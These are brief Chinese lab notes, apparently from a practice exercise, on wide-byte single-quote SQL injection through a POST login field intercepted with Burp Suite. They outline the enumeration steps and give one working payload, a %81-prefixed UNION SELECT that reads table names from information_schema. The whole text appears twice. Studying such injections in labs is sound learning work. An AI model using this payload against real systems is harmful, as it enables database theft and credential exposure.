宽字节单引号注入-POST提交方式,采用Burp Suite拦截
单引号注入,注入点在uname那,存在报错信息
得出字段数
得出回显点
数据库名
表名
xxx(自己输入的用户名)%81'union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()--+
列名
用户名,密码
宽字节单引号注入-POST提交方式,采用Burp Suite拦截
单引号注入,注入点在uname那,存在报错信息
得出字段数
得出回显点
数据库名
表名
xxx(自己输入的用户名)%81'union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()--+
列名
用户名,密码